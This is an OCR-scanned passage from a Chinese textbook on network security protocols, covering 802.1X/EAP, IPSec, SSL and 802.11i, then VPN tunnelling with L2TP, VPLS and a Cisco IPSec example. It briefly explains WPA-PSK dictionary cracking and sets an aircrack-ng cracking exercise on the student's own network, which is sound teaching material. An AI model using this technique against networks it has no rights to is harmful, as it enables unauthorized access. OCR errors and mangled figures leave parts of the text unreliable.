TCP/IP 协议 在 初始 设计 时 就 没有 考虑 安全 性 问题 ,因此 安全 人 员 在 不 同 层 次 上 实 
现 各 种 补充 协议 ,在 链 路 层 实 现 802. 1X 和 EAP 协议 用 于 身份 认证 ,网 络 层 和 传输 层 分 
别 实现 IPSec 和 SSL 协议 进行 加 密 、 完 整 性 检测 和 不 可 否认 ,802. 11i 协议 则 是 专用 于 
WLAN 的 安全 通信 。 

802. 1 X 和 EAP 协议 结合 实现 基于 MAC 地 址 和 交换 机 端口 的 身份 认证 ,将 交换 机 











加 ”http://hackerws2009. blog. 163. com/blog/static/134772814201201092429964/。 
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端口 逻辑 划分 为 受 控 和 非 受 控 。 受 控 端口 只 有 在 用 户 提 交 的 EAP 报 文通 过 了 服务 器 端 
的 认证 后 ,才能 转换 为 授权 状态 ,指定 MAC 地 址 的 网 络 访问 报 文才 能 够 从 该 端口 转发 。 

IPSec 协议 分 为 AH 和 ESP 两 种 ,AH 仅 实现 身份 验证 和 完整 性 检测 ,对 IP 头 部 和 
报 文 进行 HMAC 散 列 码 计算 ; ESP 除 实 现 AH 功能 外 ,还 可 以 对 报 文 内 容 加 密 , 但 是 它 
的 验证 范围 不 包括 卫 头 部 。AH 和 ESP 协议 可 以 组 合 使 用 。IPSec 存在 传输 模式 和 隧 
道 模式 ,传输 模式 用 于 两 台 主 机 之 间 安 全 通信 ,而 隧道 模式 可 用 于 两 个 子 网 之 间 安 全 通 
信 。IPSec 在 安全 通信 之 间 必 须 经 过 IKE 协议 建立 通信 双方 的 安全 关联 SA,SA 是 一 组 
参数 集合 ,用 于 协商 通信 双方 实现 安全 通信 所 需要 的 算法 、 密 钥 等 信息 。IKE 实现 较为 
复杂 ,分 为 两 个 阶段 ,第 一 阶段 协商 并 创建 一 个 安全 通信 信道 (IKE SA) ,并 对 该 信道 进行 
验证 ; 第 二 阶段 用 已 建立 的 IKE SA 来 建立 IPSec SA。 

SSL 在 传输 层 实现 安全 通信 ,主要 用 于 HTTP 协议 。 它 包括 记录 协议 .报警 协议 、 密 
码 规 范 变 更 协议 和 握手 协议 。 记 录 协 议 承 载 其 他 三 种 协议 以 及 加 密 后 的 数据 ,提供 数据 
加 密 和 数据 完整 性 验证 等 功能 。 握 手 协议 最 为 复杂 ,在 握手 协议 中 产生 主 密 钥 , 然 后 用 密 
钥 导出 函数 处 理 主 密 钥 , 从 而 产生 对 称 加 密 的 会 话 密 钥 , 分 为 hello、 密 钥 协 商 和 finished 
三 个 阶段 。SSL 的 协议 版 本 包括 SSLv1、SSLv2、SSLv3 和 TLSv1。 

802.11 i 主要 由 临时 密 钥 完 整 性 协议 TKIP 和 CCMP 两 个 协议 组 成 。TKIP 是 
WEP 协议 的 改进 ,基于 用 户 而 不 是 主机 动态 分 配 临 时 密 钥 TK, 密 钥 空间 为 2* ,会话 密 
钥 采 用 二 级 伪 随 机 数 生成 器 算法 生成 ,使 用 Michael 算法 实现 完整 性 校 验 ,安全 性 较 高 。 
CCMP 使 用 高 强度 加 密 算法 AES 的 计数 器 模式 (Counter-Mode) 实 现 加 密 , 使 用 CBC 模 
式 实现 散 列 码 的 生成 , 相 比 TKIP 具有 更 好 的 安全 性 ,但 是 计算 复杂 度 也 相应 提高 。 
TKIP 和 CCMP 都 需要 通过 安全 关联 实现 身份 认证 和 密 钥 分 配 ,身份 认证 基于 802. 1X 
和 EAP, 密 钥 分 配 采 用 四 次 握手 协议 。 密 钥 分 配 时 ,通信 双方 互相 发 送 随机 数 ,根据 约定 
的 预 主 密 钥 PMK ,产生 相同 的 成 对 过 渡 密 钥 PTK ,其 中 包含 CK 和 EK ,用 于 验证 密 钥 分 
配 过 程 正确 性 。 密 钥 分 配 结束 后 ,PTK 中 包含 的 TK 即 为 双方 拥有 的 相同 临时 密 钥 。 

在 无 线路 由 器 上 配置 的 WPA/PSK 协议 对 应 的 是 TKIP 协议 ,PSK 指 主机 与 AP 预 
共享 密 钥 , WPA2 对 应 CCMP 协议 。 无 线路 由 口令 的 破解 基于 密 钥 分 配 协 议 的 四 路 握手 
报 文 , 对 预 主 密 钥 进行 穷 举 攻击 ,匹配 第 二 路 报 文 的 散 列 码 信息 。 


习 题 


10-1 简 述 802. 1X 的 工作 过 程 。 

10-2 AH 协议 是 否 能 够 用 于 两 个 经 过 NAT 转换 的 不 同 局 域 网 主机 之 间 的 安全 通 
信 ? 请 说 明 原 因 。ESP 能 否 适用 ? 为 什么 ? 

10-3 AH 协议 与 ESP 协议 有 何 区 别 ? 

10-4 IPSec 有 哪 两 种 运行 模式 ? 分 别 适用 于 什么 样 的 安全 场合 ? IPSec 如 何 修改 
IP 报 文 来 实现 安全 通信 ? 

10-5 ”IKE 为 通信 双方 建立 安全 关联 需要 经 过 哪 两 个 阶段 ? 各 完成 什么 功能 ? 

10-6 ”SSL 握手 协议 分 为 哪 三 个 阶段 ? 每 个 阶段 个 实现 什么 功能 ?分 别 使 用 了 哪些 





Sa 网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 


消息 ? 

10-7 SSL 包括 哪 几 个 子 协 议 ? 哪 两 个 最 为 重要 ? SSL 如 何 结 合 使 用 对 称 加 密 和 公 
钥 加 密 算法 ? 

10-8 ”WLAN 中 传输 数据 是 否 一 定 要 加 密 ? 为 什么 ? 

10-9 ” 简 述 WLAN 和 LAN 的 802. 1X 认证 有 何不 同 。 

10-10 请 解释 TKIP 和 CCMP 如 何 解决 WEP 的 三 个 缺陷 。 

10-11 简 述 TKIP 的 加 密 和 完整 性 检测 过 程 。 

10-12 简 述 CCMP 的 加 密 和 完整 性 检测 过 程 。 

10-13 ”练习 使 用 aircrack-ng 套件 捕获 自身 的 WPA2/PSK 握手 包 , 并 使 用 字典 
破解 。 
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学 习 要 求 : 

。 理解 VPN 的 IP 隧道 和 虚拟 专用 局 域 网 的 基本 原理 。 

。 理解 强制 阴道 远程 接 入 和 自愿 隧道 远程 接 入 的 基本 原理 。 
。 掌握 在 Cisco 路 由 器 中 配置 IP 隧道 的 方法 。 

了 解 PGP 和 S/MIME 的 实现 原理 。 

理解 SET 的 工作 过 程 。 


TCP/IP 协议 并 不 提供 任何 安全 保证 ,网 络 应 用 程序 为 保证 安全 性 ,必须 实现 安全 通 
信 功 能 。 本 章 介 绍 常见 的 安全 应 用 层 协 议 、 虚 拟 专 用 网 、 安 全 电子 事务 协议 SET 和 安全 
邮件 协议 PGP、S/MIME。 


11.1 虚拟 专用 网 


虚拟 专用 网 (Virtual Private Network, VPN) 是 建立 在 公用 网 上 ,由 某 个 组 织 或 某 些 
用 户 专用 的 通信 网 络 。 专 用 网 络 指 网 络 基础 设施 和 网 络 中 的 信息 资源 属于 某 个 组 织 ， 
并 由 该 组 织 实施 管理 的 网 络 结构 .这 种 专 网 由 分 布 在 多 个 不 同 物理 地 点 的 子 网 互联 而 
成 。 子 网 互联 可 以 通过 公共 传输 网 络 实现 ,但 是 公共 网 络 提供 的 是 点 对 点 的 专用 链 
路 ,并 且 该 链 路 由 专 网 独占 带宽 。 专 用 链 路 费用 过 于 昂贵 ,同时 利用 率 相对 较 低 。 利 
用 互联 网 实现 专 网 的 子 网 互联 比较 适合 数据 传输 的 特点 ,而 且 价 格 便宜 ,但 是 安全 性 
无 法 保证 。 

VPN 就 是 具有 点 对 点 专用 链 路 带宽 和 传输 安全 保证 的 组 网 技术 。 虚 拟 性 表现 在 任 
意 一 对 VPN 用 户 之 间 没 有 专用 物理 连接 ,而 是 通过 公用 网 络 进行 通信 , 它 在 公用 网 络 中 
建立 自己 的 专用 隧道 ,通过 这 条 隧道 传输 报 文 ,如 图 1-13 所 示 。 其 专用 性 表现 在 VPN 之 
外 的 用 户 无 法 访问 VPN 内 部 的 网 络 资源 ,VPN 内 部 用 户 之 间 可 以 实现 安全 通信 。VPN 
可 以 在 TCP/IP 体系 的 不 同 层次 上 实现 ,可 以 有 多 种 应 用 方案 。 实 现 VPN 的 关键 技术 主 
要 有 以 下 4 个 。 

(1) 隧道 技术 (tunnel)。 将 待 传输 的 信息 经 过 加 密 和 协议 封装 处 理 后 ,再 嵌 套 装 入 另 
一 种 协议 的 数据 报 文 并 送 入 网 络 , 像 普通 报 文 一 样 传输 。 这 相当 于 在 公共 网 络 上 建立 一 
条 数据 通道 ,只 有 通道 两 端的 用 户 才 能 对 赃 套 信息 进行 解释 和 人 处理。 常见 的 隧道 技术 有 
PPTP/L2TP、GRE、MPLS、SOCKS、SSL 和 IPSec 等 ,具有 较 好 前 景 的 是 L2TP VPN、 
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IPSec VPN 和 SSL VPN。 单纯 从 网 络 安 全 性 出 发 ,IPSec VPN 是 最 佳 选择 。 

(2) 加 /解密 技术 。 基 于 已 有 的 加 /解密 技术 实现 保密 通信 。 

(3) 密 钥 管理 技术 。 建 立 隧道 和 保密 通信 都 需要 密 钥 管理 技术 的 支撑 ,通常 采用 密 
钥 交换 协议 动态 分 发 ,包括 简单 密 钥 管理 (Simple Key Management for IP,SKIP) ,安全 
管理 密 钥 管理 协议 (ISAKMP) 等 。 

(4) 身份 认证 技术 。 在 隧道 连接 开始 之 前 ,必须 确认 用 户 身 份 。 

VPN 的 解决 方案 分 为 以 下 3 种 。 

(1) 内 联网 VPN(Intranet VPN) ,用 于 实现 企业 内 部 各 个 局 域 网 的 安全 互联 ,在 互联 
网 上 建立 全 世界 范围 的 内 联网 VPN。 

(2) 外 联网 VPN(Extranet VPN) ,用 于 实现 企业 与 客户 、 供 应 商 之 间 的 互联 互通 。 
它 需要 在 不 同 企业 内 部 网 之 间 组 建 , 需 要 有 不 同 协议 和 设备 的 配合 以 及 不 同 的 安全 
配置 。 

(3) 远程 接 入 VPN(Access VPN) ,用 于 实现 企业 员工 的 远程 安全 办 公 , 用 户 既 能 获 
取 企 业内 部 网 信息 ,又 能 保证 用 户 和 企业 内 网 的 安全 。 

使 用 Internet 实现 VPN 子 网 间 互 联 时 ,通常 采用 基于 IP 的 VPN 结构 ,在 IP 网 络 的 
基础 上 构建 等 价 于 PPP 链 路 的 隧道 ,根据 隧道 传输 的 数据 类 型 可 以 分 为 IP 隧道 (传输 IP 
分 组 ) 和 二 层 隧道 (传输 链 路 层 帧 ) 。 本 节 主 要 介绍 基于 IPSec 协议 的 三 层 IP 隧道 以 及 基 
于 L2TP 协议 的 二 层 PPP 和 以 太 网 隧道 。 


11.1.1 IP 隧道 


隧道 虽然 通过 公共 区 域 ,但 是 隧道 和 公共 区 域 相互 隔离 。IP 隧道 的 含义 是 ,虽然 隧 
道 两 端的 传输 路 径 经 过 IP 网 络 ,但 是 经 过 隧道 传输 的 分 组 与 其 他 经 过 网 络 传输 的 分 组 之 
间 相 互 隔绝 ,IP 隧道 仅 传输 VPN 子 网 之 间 的 数据 。 

图 11-1 给 出 了 基于 IP 隧道 的 企业 子 网 互联 结构 ,两 个 企业 内 部 子 网 10. 3. 1. 0/24 
和 10. 3.2.0/24 虽然 分 布 在 两 个 物理 地 点 ,通过 Internet 互联 ,但 是 不 同 子 网 之 间 通 信 仍 
然 使 用 本 地 IP 地 址 ,而 不 是 公共 IP 地 址 。 企 业内 部 路 由 器 R1 和 R2 连接 Internet 的 端 
口 分 配 了 公共 IP 地 址 100.1.1.1 和 200.1.1.1, 它 们 作为 IP 隧道 的 两 端 用 来 传输 子 网 间 
通信 的 IP 分 组 ,因此 称 为 IP 隧道 ,等 同 于 点 对 点 链 路 。 









端口 2 
LAN 








图 11-1 点 对 点 了 P 隧道 


Rl 和 R2 为 了 封装 IP 分 组 ,需要 修改 路 由 表 和 定义 相应 的 隧道 。 以 RI1 为 例 ,路 由 
表 如 表 11-1 所 列 , 其 中 隧道 1 定义 为 “ 源 地 址 100. 1. 1. 1 ,目标 地 址 200. 1. 1. 1”。 
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表 11-1 路 由 器 R1 的 路 由 表 























目标 地 址 转发 端口 下 一 跳 
10. 3. 1. 0/24 端口 1 直接 转发 
200. 1.1. 1/32 端口 2 100.1.1.2 
10. 3. 2. 0/24 隧道 ] | 
0.0.0.0/0 端口 2 100.1.1.2 





假定 10.3.1.5 的 主机 A 希望 访问 地 址 为 10. 3. 2. 9 的 主机 B, 它 首先 把 分 组 发 往 网 
关 路 由 器 R1,R1 查找 路 由 表 ,发 现 转发 端口 是 隧道 1, 通 过 隧道 1 的 定义 获得 隧道 两 端 
IP 地 址 ,使 用 隧道 的 IP 地 址 对 分 组 进行 封装 ,增加 外 层 IP 头 部 , 源 地 址 100. 1. 1. 1, 目 标 
地 址 200. 1. 1.1, 格 式 如 图 11-2 所 示 。 


子 网 间 传 输 
10.3.1.5 10.3.2.9 | 类 型 | ”数据 的 IP 分 组 








[ioo1LLL 200.1.1.1 隧道 数据 | 隧道 格式 





图 11-2 隧道 格式 封装 过 程 


隧道 格式 也 是 IP 分 组 ,只 是 它 的 数据 字段 包含 了 另外 一 个 IP 分 组 ,就 像 在 一 封 信 的 
外 面 套 上 了 另 一 个 信封 ,并 重新 写 上 收发 地 址 。 封 装 后 ,R1l 对 将 要 转发 的 隧道 分 组 继续 
查找 路 由 表 , 根 据 目标 IP 地 址 200. 1. 1. 1 ,将 分 组 从 端口 转发 ,下 一 跳 为 100. 1. 1.2, 此 后 
隧道 分 组 像 普 通 IP 分 组 一 样 ,在 Internet 上 传输 。 当 R2 收 到 隧道 分 组 时 , 它 检查 IP 分 
组 的 协议 字段 ,知道 它 是 隧道 分 组 , 则 将 内 层 IP 分 组 剥离 出 来 ,再 以 内 层 IP 分 组 的 目标 
地 址 寻找 相应 的 路 由 并 转发 。 

隧道 技术 只 能 负责 数据 封装 ,可 以 把 企业 的 本 地 IP 地 址 封装 为 公共 IP 地 址 在 Internet 
传输 ,但 是 无 法 解决 经 过 Internet 传输 数据 的 安全 性 问题 。IPSec 的 隧道 模式 可 以 保证 数据 
的 保密 性 和 完整 性 , 它 建立 路 由 器 R1 的 端口 2 到 路 由 器 R2 的 端口 2 的 安全 关联 SA , 配 
置 隧道 两 端 协商 相同 的 安全 参数 , 即 把 SA 与 隧道 绑 定 在 一 起 。IPSec VPN 一 般 采 用 
ISAKMP 框架 的 不 同 实例 (如 IKE) 动 态 建立 安全 关联 ,具体 过 程 参见 10.2.4 节 。 

假设 最 后 双方 建立 的 安全 参数 为 ESP 协议、 加密 算 法 AES、 认 证 算法 HMAC_MD5_ 
96 .加密 密 钥 K1 和 认证 密 钥 K2, 从 源 地 址 10. 3. 1. 5 发 往 目 标 地 址 10. 3. 2. 9 的 报 文 封 
装 过 程 如 图 11-3 所 示 。R1 将 内 层 IP 分 组 封装 成 ESP 报 文 , 整 个 内 层 IP 分 组 作为 ESP 
报 文 的 数据 ,对 ESP 报 文 的 数据 和 尾部 进行 AES 加 密 , 密 钥 为 K1, 并 对 密 文 和 ESP 头 部 
进行 HMAC-MD5-96 运算 ,生成 96 位 的 消息 认证 码 放 在 ESP 尾部 后 面 ,最 后 对 ESP 报 
文 加 上 外 层 IP 头 部 ,封装 为 隧道 模式 ,从 RI1 的 端口 2 转发 出 去 。 


11.1.2 远程 接 入 


远程 接 人 是 企业 外 部 的 个 人 用 户 远程 拨号 接 人 企业 内 网 的 过 程 , 分 为 自愿 隧道 和 强 
制 隧道 两 种 方式 。 远 程 接 人 的 传输 路 径 由 两 部 分 组 成 ,一 是 远程 主机 与 本 地 接 人 服务 器 
(Local Access Server,LAS) 之 间 的 点 对 点 (Point to Point Protocol,PPP) 链 路 ,二 是 接 入 
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96 位 











100.1.1.1 


图 11-3 ESP 封装 隧道 报 文 过 程 


服务 器 与 企业 边界 路 由 器 的 Internet 链 路 。 自 愿 隧道 的 两 端 分 别 是 远程 主机 和 企业 边界 
路 由 器 ,强制 隧道 的 两 端 分 别 是 LAS 和 企业 边界 路 由 器 。 

第 二 层 隧 道 用 于 传输 链 路 层 帧 ,功能 等 同 于 物理 层 链 路 。 第 二 层 隧 道 协议 (Layer 2 
Tunneling Protocol,L2TP) 是 一 种 动态 建立 的 基于 IP 网 络 的 二 层 隧 道 的 信 令 协议 ,目前 
常见 的 是 L2TPv3。 企 业 边 界 路 由 器 称 为 L2TP 网 络 服务 器 (L2TP Network Server， 
LNS) ,LNS 负责 远程 主机 的 身份 认证 和 内 部 IP 地 址 分 配 , 实 现 远 程 主机 接 入 内 部 网 络 









































的 过 程 。 
二 层 隧 道 封 装 MAC 和 PPP 帧 的 格式 如 图 11-4 所 示 , 各 个 字段 的 含义 如 下 。 
标志 ”地址 ”控制 ”协议 信息 CRC 标志 
Ea ] 7E | ppp 帧 
变 长 1 
1001.11 [20011.1 | ms | 会 话 标识 符 | Cookie [标志 | 序号 | 。 数据 
IP 头 部 2 层 障 道 
源 地 址 ”目标 地 址 ”协议 FCS 
SA DA 以 太 网 帧 
6 6 2 4 





图 11-4 二 层 隧 道 封装 帧 示例 


(1) 会 话 标识 符 。32 位 ,用 于 唯一 标识 二 层 隧道 ,功能 相当 于 语音 信道 的 时 隙 号 。 
它 具 有 本 地 意义 ,接收 方 用 它 确定 传输 数据 的 虚拟 线路 。 
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(2) Cookie: 32 位 或 64 位 ,也 用 于 标识 二 层 隧道 ,是 一 组 随机 产生 的 数字 ,用 于 防止 
攻击 者 伪造 二 层 隧 道 报 文 , 同 样 具有 本 地 意义 ,用 于 确定 本 地 传输 线路 。 

(3) 标志 : 8 位 ,标志 S 位 置 1 时 ,表示 报 文 包含 了 序号 字段 。 

(4) 序号 : 24 位 ,从 0 开始 ,每 发 送 一 帧 ,序号 加 1, 防 止 乱 序 到 达 和 重 放 攻击 。 

强制 隧道 的 网 络 结构 如 图 11-5 所 示 ,远程 主机 首先 建立 与 LAS 之 间 的 点 对 点 语音 
信道 ,再 由 LAS 建立 与 LNS 之 间 基 于 IP 网 络 的 第 二 层 隧道 ,LAS 负责 转换 语音 信道 和 
二 层 隧 道 ,使 得 远程 主机 可 以 与 LNS 之 间 交 换 PPP 帧 。 















































LAS 路 由 表 R2 路 由 表 
目标 地 址 | 转发 端口 | 下 一 跳 目标 地 址 | 转发 端口 | 下 一 跳 
200.1.1.1 1 100.1.1.2 100.1.1.1 2 200.1.1.2 
i 10.3.2.0/24 1 直接 
语音 信道 和 隧道 交接 表 
10.3.2.2/32 200 100 
语音 信道 | 隧道 号 Ee 
1.10 100 200 



















LAS 
端口 2 
200.1.1.1 


100.1.1.2 
远程 用 户 A 
1. 建立 语音 信道 10.3.2.9 
2, 建立 PPP 链 路 














人 3. 建 立 三 层 隧道 
_ 4. 建立 PPP 链 路 病 
号 5. 认证 接 和 用户 ， 分 配 内 部 中 地 址 
图 11-5 远程 接 入 的 强制 隧道 示例 
强制 隧道 的 接 人 过 程 如 下 : 


(1) 建立 远程 接 入 用 户 A 和 LAS 之 间 的 语音 信道 ,LAS 连接 PSTN 的 E3 链 路 必须 
为 语音 信道 分 配 一 个 时 隙 ,图 11-5 中 假定 为 “1. 10”,LAS 使 用 该 时 隙 标识 语音 信道 ,该 语 
音信 道 为 A 和 LAS 之 间 传 输 PPP 帧 的 物理 链 路 。 

(2) 建立 PPP 链 路 ,A 和 LAS 之 间 交 换 PPP 控制 帧 ,进行 PPP 参数 协商 ,并 由 LAS 
指定 认证 协议 ,完成 认证 后 ,确定 R2 的 “200. 1.1.1” 端 口 为 A 的 网 络 接 入 服务 器 LNS。 

(3) 建立 LAS 和 LNS 之 间 的 二 层 隧道 ,假设 建立 完毕 后 隧道 的 标识 为 A100 200”, 即 
源 地 址 “100. 1.1.1”, 目 标 地 址 ”200. 1. 1. 1”,LAS 将 语音 信道 “1. 10” 与 隧道 *100 200” 绑 
定 作为 交接 表 的 一 项 ,此 时 A 与 LNS 之 间 的 虚拟 点 对 点 链 路 建立 完毕 。 

(4) 建立 A 与 LNS 之 间 的 PPP 链 路 ,双方 交换 PPP 控制 帧 ,指定 认证 协议 ,A 根据 
认证 协议 向 LNS 传输 认证 信息 ,由 LNS 完成 对 A 的 身份 认证 。 

(5) 分 配 内 部 网 络 全 地址 ,LNS 完成 身份 认证 后 ,为 A 分 配 内 部 耳 地址 “10. 3. 2. 2”， 
将 该 全 地 址 与 隧道 “200 100” 绑 定 , 作 为 路 由 表 中 一 项 。 

强制 隧道 的 数据 传输 过 程 中 经 过 不 同 节点 时 的 协议 转换 关系 如 图 11-6 所 示 。 
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10.3.3.2 10.3.2.9 IP 分 组 
标志 ”地 址 控制 协议 | 信息 ”CRC 标志 
五 | 外 [oo 五 PPP 帧 
1 2 变 长 有 1 
隧道 标识 符 
I00LLL | 200111 [ 115 | 100 | Cookie | 标志 | 序号 | ”数据 层 隧道 
IP 头 部 二 屋 隧道 
IP 
PPP 
cob 
语音 本 
信道 
LAS 10.3.2.9 
接 入 用 os 
户 A 


图 11-6 强制 隧道 的 协议 转换 过 程 


(1) A 访问 内 网 主机 “10. 3. 2.9” 时 ,首先 将 以 “10. 3. 2. 2? 为 源 地 址 “10. 3. 2. 9” 为 目 
标 地 址 的 IP 分 组 封装 为 PPP 帧 ,通过 语音 信道 “1. 10” 发 送 给 LAS。 

(2) LAS 此 时 相当 于 物理 层 中 继 设备 ,从 字 节 流 中 分 离 出 PPP 帧 后 ,将 该 PPP 帧 封 
装 为 二 层 隧道 格式 。 

(3) LAS 进一步 对 二 层 隧 道 报 文 增 加 外 层 IP 头 部 , 源 地 址 *100. 1. 1. 1”, 目 标 地 址 
“200. 1. 1. 1” ,发送 给 LNS。 

(4) LNS 收 到 后 ,检查 IP 头 部 的 协议 字段 ,发现 是 二 层 隧道 报 文 ,从 中 分 离 出 PPP 
帧 ,进而 分 离 出 IP 分 组 ,得 到 目标 地 址 为 “10. 3. 2. 9” ,查找 路 由 表 , 得 知 该 地 址 属于 直 连 
网 络 ,直接 转发 即 可 。 

强制 隧道 方式 下 , 接 人 用 户 A 并 不 知道 LAC 自动 与 LNS 建立 了 二 层 隧道 。 在 实际 
应 用 中 ,远程 用 户 可 能 需要 直接 与 LNS 建立 二 层 隧 道 ., 并 以 二 层 隧道 作为 点 对 点 链 路 , 通 
过 PPP 完成 身份 认证 和 内 部 IP 地 址 分 配 等 功能 ,直接 将 用 户 接 入 内 网 ,这 种 方式 称 为 自 
愿 隧道 。 自 愿 隧道 的 网 络 结构 如 图 11-7 所 示 ,具体 接 入 过 程 如 下 : 

(1) 建立 A 与 LAS 之 间 的 语音 信道 “1. 10”; 

(2) 建立 A 和 LAS 之 间 的 PPP 链 路 ,完成 对 A 的 身份 认证 ; 

(3) LAS 为 A 分 配 公共 了 全 地 址 "100.1.2.1”, 并 在 路 由 表 中 将 公共 下 地址 ”100.1.2.1” 和 
语音 信道 “1. 10” 绑 定 在 一 起 ; 

(4) A 与 LNS 之 间 建 立 基于 IP 网 络 的 二 层 隧道 ,构建 点 对 点 链 路 ; 

(5) A 与 LNS 在 二 层 隧 道上 交换 PPP 控制 帧 ,完成 参数 协商 ,建立 PPP 连接 ; 

(6) A 与 LNS 之 间 基 于 PPP 连接 完成 身份 认证 ,分 配 内 部 网 络 地 址 “10. 3. 2. 2”， 
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LAS 路 由 表 R2 路 由 表 

目标 地 址 | 转发 端口 下 一 跳 目标 地 址 | 转发 端口 | 下 一 跳 

200.1.1.1 1 100.1.1.2 100.1.2.0/24 2 200.1.1.2 

10.3.2.0/24 1 直接 
语音 信道 和 隧道 交接 表 
10.3.2.2/32 200 100 
语音 信道 | 目标 地 址 EE 
1.10 100.1.2.1 
























地 址 池 “端口 1 
100.1.2.0/24 100.1.1.2 


1. 建立 语音 信道 10.3.2.9 


2. 建立 PPP 链 路 
3. 分 配 公共 IP 地 址 




















100.1.2.1 
4. 建立 二 层 隧道 ) 
> 5. 建立 PPP 链 路 一 
- 6. 认证 接 入 用 户 ， 分 配 内 部 IP 地 址 一 





图 11-7 自愿 隧道 网 络 结构 示例 


LNS 添加 路 由 项 ,将 目标 地 址 "10. 3. 2. 2” 与 二 层 隧 道 绑 定 。 

自愿 隧道 的 数据 传输 经 过 不 同 节点 时 的 协议 转换 过 程 见 图 11-8, 说 明 如 下 : 

(1) A 访问 内 部 主机 “10. 3. 2.9” 时 ,创建 以 "10. 3. 2. 2” 为 源 地 址 ,“10. 3. 2. 9” 为 目标 
地 址 的 IP 分 组 ,该 分 组 需要 通过 PPP 链 路 传输 ,因此 封装 为 PPP 帧 ,通过 二 层 隧道 传输 
给 LNS; 

(2) 二 层 隧 道 的 源 地 址 是 A 的 公共 IP 地 址 *100. 1. 2. 1”, 目 标 地 址 是 “200. 1. 1. 1”， 
A 将 PPP 帧 封装 为 隧道 报 文 ; 

(3) 隧道 报 文 必须 通过 语音 信道 传递 给 LAS, 因 此 必须 封装 为 A 与 LAS 之 间 的 
PPP 链 路 帧 进行 传输 ; 

(4) LAS 收 到 PPP 帧 后 ,分 离 出 隧道 报 文 , 根 据 外 层 IP 头 部 的 目标 地 址 进行 路 由 查 
找 ,发 给 LNS; 

(5) LNS 收 到 报 文 后 ,检查 IP 头 部 的 协议 字段 ,分离 出 内 层 PPP 帧 及 IP 分 组 ,得 到 
目标 IP 地 址 “10. 3. 2. 9”, 查 找 路 由 表 , 直接 转 发 。 

二 层 隧道 的 安全 机 制 采用 ESP 传输 模式 ,如 图 11-9 所 示 。IP 头 部 的 协议 字段 为 50， 
ESP 头 部 的 下 一 个 头 部 字段 是 17 ,表示 ESP 数据 是 UDP 报 文 ,UDP 报 文 的 目的 端口 号 
为 1701, 表 示 UDP 报 文 数据 是 二 层 隧道 格式 。 因 此 ,使 用 ESP 传输 模式 时 ,将 二 层 隧 道 
报 文 先 封装 为 UDP 报 文 。 


11.1.3 虚拟 专用 局 域 网 


虚拟 专用 局 域 网 (Virtual Private LAN Service,VPLS) 将 多 个 不 同 物理 位 置 的 主机 
连接 成 为 单个 LAN ,网 络 结构 如 图 11-10 所 示 。 主 机 A 和 主机 D 虽然 分 别 在 两 个 通过 
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1P 分 组 
标志 地 址 控制 协议 
7TE | FF | 03 |o0021 PPP 帧 
1 1 1 2 
100.1.1.1| 200.1.1.1| 115 100 | Cookie 二 层 隧道 报 文 
IP 头 记 
协议 
0021 PPP 帧 
= 语音 信道 
IP 
加 MAC 
PPP IP 
二 层 隧道 | _/ PPP | MAC (Pas) 物理 
本 
IP Cy 语音 | 物理 层 > | 
PPP 信道 
语音 LAS 10.3.2.9 
祝 道 
接 入 用 户 A 
图 11-8 自愿 隧道 的 协议 转换 过 程 
103.32 | 10329 IP 分 组 
标志 地 址 控制 协议 | 信息 CRC 标志 
BE [FF T 0% To 7E PPP 帧 
1 1 1 2 2 
会 话 标识 符 
100.1.1.1| 200.1.1.1| 115 | 100 [ Cookie 标志 [序号 数据 “- 层 隧道 报 文 
目标 端 [ 
1701 UDP 报 文 
图 11-9 二 层 隧 道 的 ESP 封装 示例 
CE1 路 由 表 CE2 路 由 表 
目标 地 址 | 转发 端口 | 下 一 跳 目标 地 址 | 转发 端口 | 下 一 跳 
200.1.1.1 1 100.1.1.2 100.1.1.1 2 200.1.1.2 
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图 11-10 ”VPLS 网 络 结构 示例 
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Internet 互联 的 LAN 上 ,但 是 它们 像 在 同一 个 LAN 上 直接 传输 MAC 帧 。 对 于 A 和 D 
之 间 的 MAC 帧 传输 路 径 ,CE 作为 桥接 设备 ,将 从 交换 机 收 到 的 MAC 帧 通过 二 层 隧 道 
发 给 另外 一 个 CE。 对 于 二 层 隧 道 ,CE 又 是 边界 路 由 器 ,将 封装 成 IP 分 组 的 二 层 隧 道 报 
文 转发 给 下 一 跳 路 由 器 ,到 达 隧 道 另 一 端的 CE。 

交换 机 的 每 个 VLAN 都 有 对 应 的 网 桥 和 站 表 , 它 对 收 到 的 每 一 帧 首先 确定 该 帧 所 属 
的 VLAN, 然 后 提交 给 所 属 网 桥 转发 。 通 过 二 层 隧道 收 到 MAC 帧 时 ,根据 传输 MAC 帧 
的 障 道 标记 确定 所 属 VLAN ,而 不 是 根据 MAC 帧 携带 的 VLAN 标记 ,因此 必须 为 每 个 
VLAN 建立 独立 的 二 层 隧 道 ,将 隧道 的 会 话 标识 符 与 相应 VLAN 号 绑 定 。 

当主 机 A 向 主机 D 发 送 MAC 帧 时 ,CE1 首先 检查 该 MAC 帧 属于 VLAN1, 查 找 
VLAN1 的 站 表 (图 11-11) ,知道 转发 端口 是 二 层 隧 道 , 则 将 MAC 帧 从 二 层 隧 道 转发 即 
可 。 二 层 隧 道 的 源 地 址 是 “100. 1.1.1”, 目 标 地 址 是 "200.1.1.1”。 当 CE2 收 到 隧道 报 文 
时 ,分 离 出 MAC 帧 ,检测 隧道 报 文 绑 定 的 VLAN 号 ,然后 查找 本 地 相应 的 VLAN 站 表 ， 
得 到 相应 转发 端口 并 转发 MAC 帧 。 需 要 注意 的 是 ,每 个 CE 的 VLAN 号 只 有 本 地 意义 ， 
需要 两 个 物理 子 网 设置 相同 的 VLAN 号 ,并 且 绑 定 同一 个 二 层 隧 道 , 才 可 以 成 功 通信 。 
数据 传输 过 程 中 的 协议 转换 如 图 11-12 所 示 。 

































































CE1 VLAN 表 CEI VLANI1 站 表 CEI VLAN2 站 表 
上 MAC | 而 
10.3.2.0/24 1 E 了 
10.4.2.0/24 | 本 | F | 暗道 100 200 2 
MAC MAC 
wm WY Dm 
主机 A 主机 D 





图 11-12 VPLS 协议 转换 过 程 
11.1.4 IPSec VPN 示例 


图 11-13 给 出 了 一 个 基于 Cisco 路 由 器 的 网 络 拓扑 ,用 于 说 明 如 何在 Cisco 路 由 器 上 
实现 隧道 模式 的 IPSec VPN 设置 ,使 得 子 网 “10. 0. 0.0/24” 和 “10.4.0.0/24” 可 以 安全 通 
信 , 其 中 RO 和 R2 分 别 是 IP 隧道 的 两 端 。 它 们 的 有 关 配 置 如 图 11-14 所 示 。“crypto 
